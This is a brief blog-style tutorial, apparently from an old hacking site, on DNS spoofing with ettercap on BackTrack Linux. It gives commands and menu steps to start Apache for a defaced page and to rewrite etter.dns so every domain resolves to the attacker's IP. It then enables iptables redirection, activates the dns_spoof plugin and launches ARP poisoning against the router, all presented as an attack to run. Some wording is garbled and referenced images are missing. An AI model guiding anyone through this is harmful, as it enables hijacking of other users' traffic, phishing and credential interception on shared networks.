6QKG46V9ZGDJ
This is tutorial How to DNS Spoofing with Backtrack
DNS spoof is to hijack a request from a client to resolve a domain name so that the attacker can freely mereply falsely client request.
can be imagined like this
lets do it.
open ettercap-ng GUI mode
select card interface or generally to wireless is wlan0
2. enabled httpd or apache
root@bt:~# sh -c “start-apache”
edit / var / www / index.html to deface the pages we arbitrarily.
# kate /var/www/index.html
3. edit etter.dns
root@bt:~# cd /usr/share/ettercap/
root@bt:/usr/share/ettercap# cp etter.dns etter.dns.old
root@bt:/usr/share/ettercap# kate etter.dns
delete all fields write
* A IP-ATTACKER
4. uncomment ip table ettercap-ng
root@bt:~# kate /etc/etter.conf
uncomment 2 line, redir_command_on with redir_command_off
Like this one
Save and close
5. activated plugin dns_spoof on ettercap (CTRL + P).
actived with double click
6. scan hosts list (CTRL + S).
7. add target list (add just in ip router ) (CTRL + T).
contents of target 1 with the ip router (/ 192.168.1.1 /) for target 2 clear ip for all requests can be spoofed ip we just concentrating on just the router ip.
8. activated MITM attack ARP Poisoning (Mitm -> Arp Poisoning).
just select "Sniff remote connections." click OK
9 .start sniffing happy ending ;-) (CTRL + W).
end of How to DNS Spoofing with Backtrack
Dumb Answer
0 comments:
Post a Comment